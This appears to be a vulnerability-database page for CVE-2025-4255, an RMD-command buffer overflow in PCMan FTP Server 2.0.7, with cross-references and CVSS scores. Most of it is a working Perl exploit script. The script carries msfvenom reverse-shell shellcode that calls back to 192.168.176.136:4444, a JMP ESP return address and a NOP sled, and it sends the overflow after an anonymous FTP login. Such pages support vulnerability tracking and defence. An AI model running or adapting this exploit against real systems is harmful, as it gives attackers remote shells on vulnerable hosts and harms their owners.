📄 PCMan FTP Server 2.0.7 Buffer Overflow

🗓️ 17 Jun 2025 00:00:00Reported by Fernando MengaliType

Exploit for PCMan FTP Server 2.0.7 buffer overflow tested on Windows XP.

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2025-4255	4 May 202519:35	–	circl
CNNVD	PCMan FTP Server 安全漏洞	5 May 202500:00	–	cnnvd
CNVD	PCMan FTP Server RMD Command Handler Buffer Overflow Vulnerability	14 May 202500:00	–	cnvd
CVE	CVE-2025-4255	5 May 202500:00	–	cve
Cvelist	CVE-2025-4255 PCMan FTP Server RMD Command buffer overflow	5 May 202500:00	–	cvelist
Exploit DB	PCMan FTP Server 2.0.7 - Buffer Overflow	15 Jun 202500:00	–	exploitdb
EUVD	EUVD-2025-13341	3 Oct 202520:07	–	euvd
NVD	CVE-2025-4255	5 May 202500:15	–	nvd
Positive Technologies	PT-2025-18969	17 Apr 202500:00	–	ptsecurity
RedhatCVE	CVE-2025-4255	7 May 202500:24	–	redhatcve

# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
    # Date: 04/17/2025
    # Exploit Author: Fernando Mengali
    # Vendor Homepage: http://pcman.openfoundry.org/
    # Software Link:
    https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
    # Version: 2.0.7
    # Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
    Service Pack 2)
    # CVE: CVE-2025-4255
    
    # msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
    EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
    #offset: 2007
    #badchars: \x00\x0a\x0d
    #EIP: 0x74e32fd9 (JMP ESP)
    
    my $buf =
    "\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
    "\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
    "\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
    "\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
    "\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
    "\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
    "\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
    "\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
    "\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
    "\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
    "\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
    "\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
    "\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
    "\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
    "\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
    "\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
    "\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
    "\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
    "\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
    "\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
    "\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
    "\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
    "\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
    "\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
    "\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
    "\x17";
    
    
    # Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
    
    my $sock = IO::Socket::INET->new(
        PeerAddr => "192.168.176.131",
        PeerPort => "21",
        Proto    => 'tcp',
    ) or die "Cannot connect to 192.168.176.131:21: $!\n";
    
    my $offset = "A"x2007;
    my $eip = "\xd9\x2f\xe3\x74";
    my $nops = "\x90"x20;
    my $payload = $offset . $eip . $nops . $buf;
    my $r = <$sock>;
    print $sock "USER anonymous\r\n";
    $r = <$sock>;
    print $r;
    sleep(1);
    print $sock "PASS anonymous\r\n";
    $r = <$sock>;
    print $r;
    sleep(1);
    print $sock "RMD $payload\r\n";
    $r = <$sock>;
    print $r;
    sleep(1);
    close($sock);

17 Jun 2025 00:00Current

7.5High risk

Vulners AI Score7.5

CVSS 3.17.3 - 9.8

CVSS 46.9

CVSS 27.5

CVSS 37.3

EPSS0.04384

SSVC